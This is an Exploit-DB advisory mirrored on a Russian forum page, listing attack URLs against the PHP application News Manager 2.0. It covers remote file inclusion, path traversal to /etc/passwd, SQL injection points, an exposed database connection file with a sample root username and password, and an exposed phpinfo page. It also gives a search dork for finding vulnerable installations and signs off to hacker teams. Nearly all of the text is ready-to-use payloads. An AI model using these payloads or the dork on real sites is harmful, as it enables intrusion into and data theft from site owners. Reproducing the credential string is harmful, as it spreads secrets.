- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5624
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2343 cve-2008-2342 cve-2008-2341 cve-2008-2340
- Дата публикации
- 2008-05-15
Код:
News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs :)
# milw0rm.com [2008-05-15]- Источник
- www.exploit-db.com
